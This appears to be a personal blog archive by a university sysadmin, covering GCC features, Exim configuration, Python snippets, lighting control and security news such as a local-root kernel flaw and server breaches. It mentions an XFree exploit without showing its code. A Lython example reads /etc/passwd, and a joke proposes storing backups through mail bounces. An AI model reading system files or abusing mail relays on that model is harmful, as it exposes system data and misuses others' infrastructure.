    Those who ingest 2,5-Dimethoxy-4-Iodophenethylamine are criminals and those who die are used to justify the banning of it. Although, it seems, we don't even need that any more.

    Now, I'm not saying that experimenting with these drugs is a good idea. Frankly, experimenting with new drugs is pretty damn stupid as far as I'm concerned. But I'm not going to stop anyone else from trying it.

    And what effect does banning every psychoactive chemical have on research? Most research grant boards won't go near these areas. It's just not worth the bother and we don't know what damage this is doing to medical knowledge because we won't even investigate it.

    Next time you're preached to about the dangers of drugs, just wonder to yourself how many of those dangers are caused by the prohibition that they are used to justify. Better yet, wonder out loud, because that's either called circular reasoning or bullshit depending on your company.

    If you didn't see this on...

    If you didn't see this on /., you really should read it: Economist: I get a kick out of you

    I've written an exploit f...

    I've written an exploit for the XFree vuln that has been doing the rounds, for my talk on Tuesday. (That I've got to write this weekend).

    Next Tuesday is sysadmin security and the week after is programming security. (1 o'clock, 308/311). I'll be pulling the exploit apart in the second of them. It's a little different than the usual kiddie exploits because X isn't suid on DoC systems.

    And Silwood still haven't told me if they'll upgrade their power supply for the PhySoc Summer Ball, and I can't confirm any hires really until I know what I'm doing about that.

    And the ICU Summer Ball may be off. East Meets West lost money, I'm pretty sure that International Night did too.

    Oh, wonderful. What a bea...

    Oh, wonderful. What a beautiful morning on which we find critical vulnerabilities in the following:

    • Windows 2000/XP/2003/NT (SYSTEM level remote exploit)
    • XFree (local root)
    • vim
    • And MyDoom has created a whole new zombie network...

    Well, Oskar can rest easy...

    Well, Oskar can rest easy, Joel told me to bugger off.

    And, it seems, censorship is, once again, the answer to everything these days.

    Things to look forward to

    Well, the first set of patches for GCC 3.5 have gone into the mm kernel tree so we can start looking forward to the release of 3.4 soon.

    The change log is here, and I'd like to highlight a few points:

    Firstly, precompiled headers. This could be a huge gain for large compile runs (KDE anyone?). Basically the compiler can precompile C/C++ headers once and so not have to repeatedly compile them for each unit (read .c or .cc file). Quoting from a snapshot gcc manual (raw texi docs):

    To create a precompiled header file, simply compile it as you would any other file, if necessary using the @option{-x} option to make the driver treat it as a C or C++ header file. You will probably want to use a tool like @command{make} to keep the precompiled header up-to-date when the headers it contains change.

    A precompiled header file will be searched for when @code{#include} is seen in the compilation. As it searches for the included file (@pxref{Search Path,,Search Path,cpp,The C Preprocessor}) the compiler looks for a precompiled header in each directory just before it looks for the include file in that directory. The name searched for is the name specified in the @code{#include} with @samp{.gch} appended. If the precompiled header file can't be used, it is ignored.

    For instance, if you have @code{#include "all.h"}, and you have @file{all.h.gch} in the same directory as @file{all.h}, then the precompiled header file will be used if possible, and the original header will be used otherwise.

    If you need to precompile the same header file for different languages, targets, or compiler options, you can instead make a @emph{directory} named like @file{all.h.gch}, and put each precompiled header in the directory. (It doesn't matter what you call the files in the directory, every precompiled header in the directory will be considered.) The first precompiled header encountered in the directory that is valid for this compilation will be used; they're searched in no particular order.

    A precompiled header can't be used once the first C token is seen. You can have preprocessor directives before a precompiled header; you can even include a precompiled header from inside another header, so long as there are no C tokens before the @code{#include}.

    The precompiled header file must be produced by the same compiler version and configuration as the current compilation is using. The easiest way to guarantee this is to use the same compiler binary for creating and using precompiled headers.

    Any macros defined before the precompiled header (including with @option{-D}) must either be defined in the same way as when the precompiled header was generated, or must not affect the precompiled header, which usually means that they don't appear in the precompiled header at all.
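
    The lookup rule in that quote can be modelled in a few lines. This is only a toy sketch in Python, not how GCC implements it: find_header is a hypothetical name, the validity checks (compiler version, macros, options) are not modelled at all, so any .gch file found is assumed to be usable, and files in a .gch directory are tried in sorted order purely to make the example deterministic (the manual says the order is unspecified).

```python
import os
import tempfile

def find_header(name, search_dirs):
    """Return the path that would be used for #include "name".

    In each directory, name + ".gch" is tried just before the plain header.
    Assumption: every precompiled header found is valid for this compilation.
    """
    for directory in search_dirs:
        pch = os.path.join(directory, name + ".gch")
        if os.path.isfile(pch):
            return pch
        if os.path.isdir(pch):
            # A directory of precompiled headers: take the first file in it.
            for entry in sorted(os.listdir(pch)):
                candidate = os.path.join(pch, entry)
                if os.path.isfile(candidate):
                    return candidate
        header = os.path.join(directory, name)
        if os.path.isfile(header):
            return header
    return None

with tempfile.TemporaryDirectory() as root:
    # Only the plain header exists at first.
    open(os.path.join(root, "all.h"), "w").close()
    without_pch = find_header("all.h", [root])
    # Once all.h.gch sits next to it, the precompiled header wins.
    open(os.path.join(root, "all.h.gch"), "w").close()
    with_pch = find_header("all.h", [root])
    print(os.path.basename(without_pch), os.path.basename(with_pch))
```

    The real compiler also falls back to the original header when the precompiled one turns out not to be usable, which this sketch leaves out.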

    Next up, several GCCisms have been removed. This is a shame as I've been known to use the first two of these in some code (that, frankly, wasn't portable anyway).

    • cast-as-lvalue: (char) i = 5;
    • conditional-expression-as-lvalue: (a ? b : c) = 2;
    • compound-expression-as-lvalue: (a, b) = 2;

    (Maybe the C standard will include these someday. Unfortunately, the GCC people don't give a rationale for removing them.)

    We also have a new unit-at-a-time compilation system for C. This allows inter-procedural optimisations. This is mostly useful for optimising static functions as GCC can now change the calling-convention for these and so forth.

    And we have make profiledbootstrap which uses the profile-feedback code from 3.3 (which is much improved in 3.4) when building the compiler. GCC claims "an 11% speedup on -O0 and a 7.5% speedup on -O2" (i386, building C++).

    Now, the question is, am I brave enough to run a snapshot? Probably not I'm afraid.

    Someone makes an obvious ...

    Someone makes an obvious discovery about Bayesian filtering the very long way round and it warrants a BBC News article. Geez. No wonder these worms find enough stupidity to spread.

    Update: Yes, I know it's the POPFile author. Doesn't mean that he's not being an idiot. He could just have opened the Bayesian db to check which words had a high positive value. Probably the BBC journalist had something to do with the crapness, however.

    Christ, it's been a long ...

    Christ, it's been a long few days. I haven't even seen one of my house mates since Tuesday and, if she didn't leave washing up to be done, I wouldn't even know if she were alive.

    So, Wednesday was band night in dB's. Sound teching again, but this time with ear defenders which work really well. The control position in dB's is about 5 meters from a speaker stack that is pointed straight at you and it's nice not to be deaf afterwards.

    Thursday was East Meets West, the Indian Society variety show. Gary has a fairly long post about it. Turns out that they had no stage crew and were just praying that it would work out or something. Either that or they expected stuff to shuffle into place on its own. So, with a couple of hours' notice and a couple of phone calls we got 4 Dramsoc people to run the stage.

    And I would like to point out that we were flawless. Even though we usually found out about a scene change about 5 minutes before it happened. Some people may complain that we missed a chair, but 13 were counted on, 13 people were on stage and they were one short. Fourteen were counted off. Go figure.

    They overran and were kicked off at about midnight. The strike only took about one and a half hours because they got away with having parcan bars and there was no lift involved. Usually when striking we have to break everything down into lift-sized chunks which takes ages. Though I didn't really grasp exactly how much of a pain this was until now.

    Last night was ChiSoc. This show was going to be an utter shambles from the start. Organisation seems to be an alien concept here. They overran by about three hours because all their scene changes took 10 minutes or so.

    It's not that they were big scene changes at all, but it took 10 minutes to figure out who was going on next. All this was sorted out by a lot of shouting in (I believe) Cantonese over the comms.

    They also shouted "Fire!" a lot when talking. I didn't figure out what this meant to them.

    And it seems that they killed one radio mic, had no stewards and thought the powerloc distro (415V, 600 amps) was a good place to keep bottles of water.

    At least I'll never have ...

    At least I'll never have the chance to fuck up this badly. (You hope!)

    Oh, and via /., Joel has written an article on writing resumes. And this is a few weeks after I submitted mine to him! (Not kidding, he's writing about submissions including mine.)

    And while I'm ranting...

    I was pleasantly surprised to come across a stall giving away free cups of instant coffee today. Instant coffee manufacturers are always welcome to solicit my custom with free stuff seeing as how I've never purchased instant coffee in my life and don't intend to.

    (As far as I'm concerned, coffee exists primarily for its caffeine content and is best expressed as an espresso. Good tasting coffee is rare and never found as a cup of anything that started out looking like powdered turd.)

    As I was sipping the free cup of tongue crematingly hot sludge my eyes slipped down to the sign advertising free decaffeinated coffee.

    It goes without saying that it went into the bin with my hand following a smooth arc after an aborted initial motion towards my mouth.

    How can there be enough flavor flummoxed fools on the planet buying this ungodly example of utterly missing the point, to make a market for decaffeinated coffee?

    An open letter to Stephen Fry:

    Dear Mr Fry,

    The command of language and humor, demonstrated in your book, is almost flawless.

    However, I must protest that the book would be immeasurably improved by omitting the entire chapter given to graphically describing a small child fucking a horse.

    Thank you

    Next week, (more for my r...

    Next week, (more for my reference than anything else)

    • Monday: Get Summer Ball sponsorship pack together
    • Tuesday: Lecture (i.e. I'm giving one) at 1pm, Hux308
    • Wednesday: Sound teching for the band night in the Union
    • Thursday: East meets West strike
    • Friday: Chisoc

    I've put the source to th...

    I've put the source to the suexec code which runs the Union server here

    And, before I forget, here's a patch for PHP 4.3.4 which fixes permissions on uploaded files in sticky dirs (or dirs with ACLs in my case).

    And I knocked together Kiss or Miss for the College RAG (charity fundraising) week last night. It still needs a little work. The idea is that people can donate to get their score bumped up :)

    Back in contact with the ...

    Back in contact with the world again... photos from Friday night. Listening to: Cats, reading: The Hippopotamus.

    And talking of cats, we got a leaflet through the door from the local vets saying "Have you seen Humphrey, our practice cat?". Wouldn't it suck to be a vet's practice cat? Any time someone's unsure how to do something - you get it. Imagine being neutered .. repeatedly :)

    The program for CodeCon 2...

    The program for CodeCon 2004 is up.

    Can I suggest that the 10...

    Can I suggest that the 100 most often misspelt English words [via Keith] are, in fact, misspelt in the dictionary and that if a word is commonly misspelt then it reflects badly on the word, not the people?

    Phew. The union server up...

    Phew. The union server upgrade kind-of went to plan. Would have gone more smoothly if I had known the correct default gateway. However, one thing really did mess me up: MySQL.

    If you remember just never to use the minus character in the name of anything mysqlish, then it's a good little database. But if you do, oh dear. I've filed several bugs about this and the MySQL developers are arguing about how valid the minus sign is; the code certainly has no idea.

    mysqldump generally gets quoting correct - except when it comes to the minus character, at which point CREATE TABLE stops working. Now, when you're importing hundreds of tables you don't see the little error message shoot by with all the status messages (even in `quiet' mode). But it turns out that you need to add the --quote-names option to the dump in order for it to do CREATE TABLE correctly. Which is a huge bodge to start off with, because (almost) everything else works fine.

    But wait until you get a minus sign in a database name. Now, not only does it not restore the database correctly, it actually errors on the USE statement and goes spewing tables into other databases. And even if you quote the database names, MySQL still can't handle it. At this point I just changed minus to underscore and said bugger it.
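
    For illustration, here is a minimal Python sketch of the kind of identifier quoting that --quote-names is there to provide. It assumes MySQL's usual rule (wrap the name in backticks and double any backtick inside it); quote_ident, create_table_sql and the example names are hypothetical and not taken from mysqldump.

```python
def quote_ident(name):
    """Backtick-quote a MySQL identifier, doubling any embedded backticks."""
    return "`" + name.replace("`", "``") + "`"


def create_table_sql(database, table, columns_sql):
    """Build a CREATE TABLE statement with database and table names quoted."""
    return "CREATE TABLE %s.%s (%s)" % (
        quote_ident(database), quote_ident(table), columns_sql)


if __name__ == "__main__":
    # Hypothetical names containing the troublesome minus sign.
    print(create_table_sql("union-web", "club-members", "id INT"))
```

    Unquoted, a name like club-members reads as a subtraction, which is presumably why the restore falls over.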

    Also, openssh 3.7 and onwards can't do PAM support correctly, so I'm sticking to 3.6.1 for now.

    While I'm posting I might...

    While I'm posting I might as well point out this link via Wes to a PDF on the marks on euro notes that machines recognise as bank notes. That's another great piece of work by Markus Kuhn.

    Spent all day configuring...

    Spent all day configuring the new mail servers at DoC. Some useful Exim snippets for future reference are below.

    Oh, and someone dug through a very important London backbone fibre this morning which took IV off the face of the net.

    This weekend is going to involve a few trial runs of the Union webserver move that I'm doing on Monday for real.

    Virtual hosting

    domainlist local_domains = @ : cdb;VHOSTCONFIG
    # Vhost routing
    vhost_aliases:
      driver = redirect
      allow_fail
      allow_defer
      domains = cdb;VHOSTCONFIG
      data = ${lookup{$local_part}nwildlsearch{${lookup{$domain}cdb{VHOSTCONFIG}}}}
      file_transport = address_file
      pipe_transport = address_pipe
      no_more

    Spam Checking with spamd

    spamcheck_router:
      driver = accept
      # ! already spam AND ! already scanned AND from offsite AND !SMTP AUTHed
      condition = "${if and { {!def:authenticated_id} {!def:h_X-Spam-Flag:} {!eq {$received_protocol}{spam-scanned}} {!eq {$received_protocol}{local}} {!match{$sender_host_address}{^(146\.169\.|155\.198\.4\.76)}} } {1}{0}}"
      transport = spamcheck
      no_verify
    ## Spam Assassin
    spamcheck:
        driver = pipe
        command = /usr/sbin/exim -i -oMr spam-scanned -f "${if eq {${sender_address}}{} {mailer-daemon} {${sender_address}} }" -- ${local_part}
        transport_filter = /usr/bin/spamc
        home_directory = "/tmp"
        current_directory = "/tmp"
        # must use a privileged user to set $received_protocol on the way back in!
        user = exim
        group = exim
        log_output = true
        return_fail_output = true

    SMTP AUTH over TLS using Kerberos via PAM

    # SMTP AUTH Settings (see also Authenticators at the bottom)
    
    auth_advertise_hosts = *
    received_header_text = "Received: ${if def:sender_fullhost {from ${sender_fullhost} ${if def:sender_ident {(${sender_ident})}}} {${if def:sender_ident {from ${sender_ident} }}}} \n\t by ${primary_hostname} ${if def:received_protocol {with ${received_protocol}}} \n\t ${if def:tls_cipher {(tls_cipher ${tls_cipher})}} ${if def:tls_peerdn {(tls_peerdn ${tls_peerdn})}} (Exim ${version_number} ${compile_number} (DoC)) \n\t id ${message_id} ${if def:authenticated_id { \n\t from user $authenticated_id}}"
    plain:
      driver = plaintext
      public_name = PLAIN
      server_condition = ${if pam{$2:${sg{$3}{:}{::}}}{yes}{no}}
      server_set_id = $2
    #  server_advertise_condition = ${if eq{$tls_cipher}{}{no}{yes}}
    
    login:
      driver = plaintext
      public_name = LOGIN
      server_prompts = "Username:: : Password::"
      server_condition = ${if pam{$1:${sg{$2}{:}{::}}}{yes}{no}}
      server_set_id = $1
    #  server_advertise_condition = ${if eq{$tls_cipher}{}{no}{yes}}

    IV now sports a brand new...

    IV now sports a brand new "JanieBox" at the top right (or possibly somewhere random if your browser doesn't do CSS very well).

    I'm getting the data from here (or more specifically from here). I've probably got the code wrong, but if you want to point it out to me the code is here

    Oh, and it's doing the US Dollar to British Pound exchange rate, for those who hadn't guessed.

    New kernel local root problem

    Hitting all current (inc 2.6) kernels. Get 2.4.24

    http://isec.pl/vulnerabilities/isec-0013-mremap.txt

    I read three [1, 2, 3 all...

    I read three [1, 2, 3 all via IP, via Keith] very good essays by Michael Crichton this morning. Now Crichton has written a couple [1, 2] of fairly noddy books recently. They weren't bad, but I couldn't help thinking that they had been written in order to become a film script (worked for one of them).

    But his essays are top-notch (and is DDT seriously not carcinogenic?). I have to be a little concerned about number three because, although I know many moronic environmentalists, I have to wonder if things wouldn't be a lot worse without them. Painful as it is to say. But they really cheered me up in contrast to all the "They did what? The morons" stories.

    This could be a Stage Sca...

    This could be a Stage Scan with a light on, right?

    screenshot

    I know the real thing isn't translucent like that, but it makes things clearer in the visualizer.

    (p.s. If you're not a member of Dramsoc you probably don't understand this post)

    Pinging

    Lython [via LtU] is a Lisp-like frontend onto Python. Now I've been meaning to write one of these for some time; good that someone has at last. For example:

    # -*- lisp -*-
    
    (def foo (a)
         (print "one")
         (print "two")
         (* a 5))
    
    (def bar (b c)
         (* b c))
    
    (def cat (file)
         (:= f (open file))
         (f.read))
    
    (print (foo "test"))
    (print (bar 5  5))
    (print (cat "/etc/passwd"))

    (and, yes, it can do simple macros)

    Firstly, the Clueless Anti-Whitespace Morons might be a little happier but that's unimportant. Mainly Lython has the ability to become the standard Lisp-like-language that Lisp has needed for a long time. As much as ANSI Common Lisp is a good (if huge) standard it still leaves far too much platform specific stuff undefined. The kind of stuff that makes code actually useful. And Lython has all the Python libraries to draw upon.

    Now Python just needs to get its basic language features working. Even in 2.3 this still doesn't work:

    def a(x):
      x = 0
      def b():
        x += 1
        return x
      return b
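
    The snippet fails because x += 1 makes x a local of b, so the read hits an unbound name. As a sketch of two ways round it (the function names are made up for illustration): a mutable cell works on 2.x, and Python 3 later added the nonlocal statement for exactly this case.

```python
def make_counter_cell():
    # Works on Python 2.x too: keep the count in a one-element list so the
    # inner function mutates the list instead of rebinding the name.
    x = [0]

    def b():
        x[0] += 1
        return x[0]
    return b


def make_counter_nonlocal():
    # Python 3 only: 'nonlocal' lets the inner function rebind the outer x.
    x = 0

    def b():
        nonlocal x
        x += 1
        return x
    return b


if __name__ == "__main__":
    counter = make_counter_nonlocal()
    print(counter(), counter())
```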

    Since Keith requested it, my build script now pings blo.gs. Due to the (cack-handed) nature of the way I do things it might `bounce' a little (e.g. update more than once for a single update) but blo.gs already seems to dampen that.

    Ah, you've got to love th...

    Ah, you've got to love the post-Christmas sales. In fact, I'm loving them to the tune of:

    The soundcard is a little odd, but it's got the best audio quality of anything in its range that I could find a review for.

    And god it sounds good. Only slight problem - I've had to remove most of the 128kbps (and below) mp3s from my playlist. Use FLAC, people!

    Well, the Xmas carnival p...

    Well, the Xmas carnival passed off ok. I lasted about 22 hours before sitting comatose in the bar. I must be getting old, I've done better than that before. (Then again, Gary's really old and he managed ok :)). Link to photos will happen at some point.

    The Artistic License box to control the MAC600 worked fine, though we ran it off the Pearl in the end. I need to write a better control interface (e.g. one that doesn't require you to input a seq of funcs for each of pan, tilt and color). To that end, PyGTK, glade and PyGtkGLExt work really well.

    I'm off home today as well. Yay Xmas break.

    (In other news: can you possibly think of anything worse than Slashdot Singles? And I'm not kidding, OSDN is really running this, complete with "First emails: What to say".)

    Snippets

    I like Artistic Licence a lot. Partly because they make some really cool stuff, but mostly because they sent me one of these for free.

    (Yes, you too can get a positive mention on IV by sending me free hardware)

    One of those, for people who don't know and can't understand the link, is an Art-Net to DMX converter. DMX is the serial protocol used for controlling stage and event lighting and so I can now control this from a Python script.
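
    As a rough idea of what such a script involves, here is a minimal sketch that builds and sends one ArtDmx frame over UDP. It assumes the published Art-Net packet layout (8-byte "Art-Net" ID, opcode 0x5000, port 6454); the function names and the host argument are hypothetical, and the channel numbers for any particular fixture would have to come from its manual.

```python
import socket
import struct

ARTNET_PORT = 6454   # UDP port used by Art-Net
OP_DMX = 0x5000      # ArtDmx opcode, transmitted low byte first


def artdmx_packet(universe, channels, sequence=0):
    """Build an ArtDmx packet carrying DMX channel levels (0-255 each)."""
    data = bytes(bytearray(channels))
    if len(data) % 2:                 # the data length must be even
        data += b"\x00"
    if not 2 <= len(data) <= 512:
        raise ValueError("need between 1 and 512 channels")
    header = (b"Art-Net\x00"
              + struct.pack("<H", OP_DMX)        # opcode, little-endian
              + struct.pack(">H", 14)            # protocol version 14
              + struct.pack("BB", sequence, 0)   # sequence, physical port
              + struct.pack("<H", universe)      # universe, low byte first
              + struct.pack(">H", len(data)))    # data length, big-endian
    return header + data


def send_dmx(host, universe, channels):
    """Send one frame to a node; host is a hypothetical converter address."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(artdmx_packet(universe, channels), (host, ARTNET_PORT))
    finally:
        sock.close()
```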

    So I'm frantically coding in whatever free time slots I can find so that I can use it to control a pair of MAC 600s on Friday.

    Of course, like all good tasks, I don't get to test it until the day of the event.

    And on the frontpage of the manual, it reads:

    This product is for professional use only. It is not for household use. This product presents risks of lethal or severe injury due to fire and heat, electric shock, ultraviolet radiation, lamp explosion and fall.

    :)

    While I'm thinking about it, a couple of Python snippets that I'm always looking for.

    Dumping an exception is:

    import traceback
    
    try:
        ...
    except:
        # print the full stack trace of whatever was just caught
        traceback.print_exc ()

    And running an interactive console looks like:

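    import code
    import threading
    import rlcompleter  # imported for its side effect: sets up tab completion
    import readline
    
    readline.parse_and_bind("tab: complete")
    
    glock = threading.Lock ()
    input_has_glock = 0
    exit_event = threading.Event ()
    
    def worker_thread ():
        # lock glock when running
        while not exit_event.is_set ():
            with glock:
                pass  # the real work goes here
            exit_event.wait (0.1)
    
    def locking_raw_input (prompt=""):
        # assumed behaviour: drop glock while waiting at the prompt and
        # retake it before the typed command runs
        global input_has_glock
        if input_has_glock:
            glock.release ()
            input_has_glock = 0
        line = input (prompt)  # raw_input (prompt) on Python 2
        glock.acquire ()
        input_has_glock = 1
        return line
    
    if __name__ == "__main__":
        import __main__
        worker = threading.Thread (target = worker_thread)
        worker.daemon = True  # don't keep the process alive after the console
        worker.start ()
        c = code.InteractiveConsole (locals=__main__.__dict__)
        c.raw_input = locking_raw_input
        c.interact ("Starting interactive control...")
        exit_event.set ()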

    My life:Last night: Setup...

    My life:

    • Last night: Setup for Streetcar. Goto Union Staff party. Start striking Streetcar. Take the money down to DPFS and get locked out of the rest of the strike. Goto Cav's with Ash and Harriet. Go back to Beit to pack away their Xmas party.
    • Today: Sleep and work on all the coursework due in this week
    • Monday: Normal day at Uni. Talk to Malcomb about Summer Ball venues. Work all evening to get coursework finished.
    • Tuesday: Normal day at uni. Setup mics for Council. Dramsoc bar night. Have to decide which parts of the all nighter I can manage.
    • Wednesday: 9am - LotR. 2pm - setup for Rock night at the Union; goes on until late then we strike it.
    • Thursday: Normal day at Uni. Rig and point parcans on the roof in the evening.
    • Friday: 7am - goto Stage with Gary to pickup lights. Rig, run and strike the Xmas Carnival. Probably a 24 hour shift.

    Fleep...

    Fleep

    So, Bush wants to go to t...

    So, Bush wants to go to the moon again. At least, he wants to announce it during his last year to try and boost his popularity before the election. He's already screwed the economy by borrowing huge amounts to fund tax cuts and a couple of semi-major wars. This is what happens when you put a monkey in charge.

    When dear old dad proposed the same thing, Congress estimated that it would cost $400 billion. I think we can safely say that it would actually cost a fair bit more than that. And for what? The first lunar missions were basically a world-wide moonie at the USSR. Certainly, it did wonders for technology, but given the price, I would certainly hope so.

    But what's the point this time? There's no USSR and we've done it all before. Go do something useful like asteroid mining instead.

    Panic, everyone upgrade r...

    Panic, everyone upgrade rsync to 2.5.7

    The number of recent atta...

    The number of recent attacks against infrastructure is getting worrying. Within the past few weeks we have had an attack on the kernel sources, on the Debian core servers and, today, on a Gentoo rsync rotation server and Savannah.

    Savannah and Debian breaks look identical. The CVS attack, we don't know about and I'm thinking that the Gentoo break was unrelated because they didn't go after the obvious spoils. I'm still very interested to know what the "remote exploit" was.

    It's still greatly worrying that someone determined and smart is going after important boxes like these. And I do mean smart - watching the BK changesets for a fix and then making a binary from the do_brk overflow isn't script kiddie stuff.

    Backup solution

    Random thoughts of the day...

    Register a domain name and point it somewhere silly like 1.1.1.1. Make a tarball of your most important files and encrypt it. Then, once a day, email it to a user at that domain name. If you have a disk failure just wait a couple of days and all your files get bounced back to you.

    Torture

    Most people would agree that torturing a conscious being is bad. Most of them would say that it's criminal and that you should be locked up for it. But what is a conscious being? At least, if it's biological and can pass the Turing Test, is that good enough?

    So now imagine your best friend doing a Turing Test. By definition your mental representation of them passes the Turing Test because if you would expect different answers then you just aren't thinking hard enough. So your mental representation is conscious.

    So now imagine torturing them. Should you be thrown in jail?

    Guardian Digital

    The Guardian Online has been my favourite online paper for a long time. I find that it, balanced against Samizdata, is best.

    But now, the Guardian is beta-testing a new service. It has both the Guardian and its sister paper, the Observer, and you can select any page from any section of the print editions and get a thumbnail view. Clicking on a story brings up the text of that story. Clicking a picture (even an advert) brings up that advert and you can get PDFs of any page. And you can go back in time to see old editions.

    This is such a gob-smackingly cool service I might even start paying for it when it leaves beta phase.

    Well, it's really peeing ...

    Well, it's really peeing it down with rain and has been all weekend. It's quite nice to look out on the rain when you're inside, but it's enough to make me not want to bother going to the supermarket so I'll probably be eating weird combinations of whatever I can find over the next week.

    Things that I need to do:

    Get the new Union webserver racked up. And by racked up, I mean in the very loosest sense as this is a desktop mini-tower that will be sitting on a rack plate.

    I then need to try and convert the users. No amount of warning is going to work for most of them and I fully expect to be snowed under with dozens of "But why shouldn't I use the account of someone who left years ago, like I always have?", "Why can't I upload gigs of warez and use the server as a distro for all my friends?" and "Your computer has broken because this has stopped working and I'm perfect and cannot possibly be doing anything wrong".

    Get the RS232 protocol to the crossovers working. The docs say that they can be daisy chained, but as far as I know they only have a single connector. I'm not sure of the electrical problems if I split the cable. And I've got to reverse engineer the undocumented bits of the protocol.

    For Zooko...

    ... if you email me to say that your mail is down you really should include a phone number or some such. Some non-email way of contacting you at least!

    I'm afraid that mail.imperialviolet.org doesn't point at anything any more. It's not a hard bounce, so mail won't fail because of it, but the server doesn't exist anymore. If you need a backup-MX I can set it up on my current mail server (a.mx.freenetproject.org).

    Dear Mr Stephenson...

    ... I'm not totally sure that the term "cluster-fuck" was in common usage in England in 1685. (Quicksilver, page 702).

    (Actually, it's a really good book. That's the first complaint I've had)

    "Wave of human spam" - ph...

    "Wave of human spam" - phrase of the week from this fantastic text. I mean, one of them seriously has a sign saying "The Illuminati must be destroyed".

    What a difference an edit...

    What a difference an editor makes, eh? All that not wanting to upset people and so forth. Well, here's the original...

    What would you do if you organised a protest and no one turned up? Well the Stop Bush Campaign are finding out at the moment. Despite getting over a hundred people willing to sign a petition asking the Union to express that the views of the entire student body were against Bush, only 16 of them were seemingly willing to express those views themselves today.

    Somewhat more were willing to brave the heated comforts of the MDH last night for the self-styled `People's AGM'. In the aforementioned meeting 32 people turned up and most of the meeting was spent trying to decide whether to protest against Bush, or against Bush and the Union. What's a protestor to do with all that pent up frustration and so much to protest about? The decision, rather unsurprisingly, was to protest against both. Also planned was a sleep-in protest, however our dedicated freedom fighters seemingly forgot their sleeping bags (despite reminders on their own posters). Maybe they value their oil-powered creature comforts too highly?

    The rather lack-lustre protest observed today from the lofty heights of Beit Towers consisted of 16 rather cold looking people and a megaphone meandering into the quad for 60 seconds before vanishing up the south steps of the Royal Albert Hall and onto Hyde Park. Of course the Union officers who were the partial target of this protest were, rather rudely, all away at Wye for the day.

    So, that was worth the days of standing on the walkway thrusting slices of pulped, dead tree at people who really don't care, wasn't it?

    (Note, I'm not pro-Bush. I'm just very anti most anti-Bush protesters. My enemy's enemy is not my friend.)

    Remembered to renew domain...

    Remembered to renew domain name with 3 hours to go.

    Hell, at least it's better than Microsoft with hotmail.co.uk

    Crush Games

    This new MP isn't very good at replying to letters. The last one at least wrote something back.

    (prompted, of course, by today's ID card announcement)

    I meant to post this a while ago. It's an extract of an email I sent. Firstly you'll need a little background: someone setup a website for registering `crushes' (I guess it goes around like those quiz things) and then opened up the database for a while before having a pang of conscience and closing it again. First I heard was spikeylady complaining:

    but am most unimpressed that I can't now find out if anyone had a crush on me

    Actually, that's a really interesting game problem. You want to know about all incoming arcs (people who have a crush on you) but are unwilling to disclose any outgoing arcs (people you have a crush on). Except I guess that you are willing to disclose if you are sure the other party has a crush on you.

    I didn't see the "crush thing", but I'm guessing you could register your crushes on other people and it would tell you about any two-node cycles (i.e. if they also fancied you). Of course, you could just falsely register everyone and find out exactly who has a crush on you. You've not given any information away because you picked the trivial subset. Of course, anyone else can do that, so the number of false positives goes up as more people choose this strategy. So pretty soon any kind of service like that is going to be useless.

    (esp if they start publishing the results)
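
    To make the register-everyone attack concrete, here is a small Python sketch of how such a service might match people up. This is a guess at the behaviour of a site that was never seen, so mutual_crushes, matches_for and the three example people are all made up.

```python
def mutual_crushes(registered):
    """Return the two-node cycles in a dict of person -> set of crushes."""
    pairs = set()
    for person, crushes in registered.items():
        for other in crushes:
            if other != person and person in registered.get(other, set()):
                pairs.add(frozenset((person, other)))
    return pairs


def matches_for(person, registered):
    """What the service would reveal to one person: reciprocated crushes."""
    return {other
            for pair in mutual_crushes(registered) if person in pair
            for other in pair if other != person}


if __name__ == "__main__":
    honest = {"alice": {"bob"}, "bob": {"carol"}, "carol": {"alice"}}
    print(matches_for("alice", honest))      # nothing reciprocated

    # The attack: alice falsely registers a crush on everyone else.
    cheating = dict(honest, alice={"bob", "carol"})
    print(matches_for("alice", cheating))    # carol's crush is exposed
```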

    Which reminds me of one of the answers to the two-party signature problem (you have a contract that two people need to sign. Neither will sign first so they take turns saying "With 1% probability I agree to this", "With 2%" ... and so on).

    Assume a fully connected, directed graph of all the people in the set of interest. Each person assigns a crush probability to each outgoing arc, and at each time slice that is the probability that they'll `ping' the node at the other end.

    Pings will be pretty random and you might see a higher than average number of pings from a given node. It could be random, but it could be that they have assigned a higher probability to you. If you crush on them, you can assign a higher probability and see if they respond. That way, pairs of crushers will rise out of the mess and no one has to disclose a non-reciprocated crush.

    A little like flirting, but could be made so that no one else sees any of the interactions by blinding the pings.
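
    A toy simulation of the ping scheme, as a sketch only: every number below (background rate, opening rate, step size, window length, threshold) is an assumption picked for illustration, and the escalate-or-back-off rule is one possible reading of "assign a higher probability and see if they respond". Blinding is not modelled.

```python
import random

BASE = 0.05     # assumed background ping probability per time slice
START = 0.10    # assumed opening probability towards someone you fancy
STEP = 0.05     # assumed adjustment after each observation window
CAP = 0.90      # assumed ceiling on any ping probability
WINDOW = 50     # time slices per observation window
THRESHOLD = 5   # incoming pings per window that count as "responding"


def simulate(people, crushes, windows=400, seed=1):
    """Return the final ping probability for every directed pair."""
    rng = random.Random(seed)
    prob = {(a, b): BASE for a in people for b in people if a != b}
    for a, targets in crushes.items():
        for b in targets:
            prob[(a, b)] = START
    for _ in range(windows):
        # Count the pings sent along each arc during this window.
        seen = {arc: sum(rng.random() < p for _ in range(WINDOW))
                for arc, p in prob.items()}
        # Each person only reacts to pings coming back from their crushes.
        for a, targets in crushes.items():
            for b in targets:
                if seen[(b, a)] > THRESHOLD:
                    prob[(a, b)] = min(CAP, prob[(a, b)] + STEP)
                else:
                    prob[(a, b)] = max(START, prob[(a, b)] - STEP)
    return prob


if __name__ == "__main__":
    people = ["alice", "bob", "carol"]
    crushes = {"alice": {"bob", "carol"}, "bob": {"alice"}}
    final = simulate(people, crushes)
    print(final[("alice", "bob")], final[("alice", "carol")])
```

    With these settings the alice/bob pair feeds back on itself and climbs towards the cap, while alice's probability towards carol should stay near its opening value because carol only ever pings at the background rate.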

    Matrix Revolutions

    Well, it seems to be Matrix-bashing day today. Well, I was watching it at 2pm GMT today and I really enjoyed it. It's certainly not the best film this year (Spirited Away) and the story is a pile of crap, but it's damn fun.

    If I had been writing the script, it could have been better of course. (Ah, I wonder how many people are saying that). But the Battle of Zion is worth the ticket price alone.

    Birthday!

    Since I don't do it nearly enough these days (being a poor, destitute student and all) I walked into a large bookshop today with a few notes in my back pocket and came out with a nice lot of dead tree, including:

    Reviews as I finish them. (Could be a while).

    Bastards! Don't they kno...

    Bastards! Don't they know how much effort by .. unknown persons .. goes into doing something like that? Or so I've heard, of course.

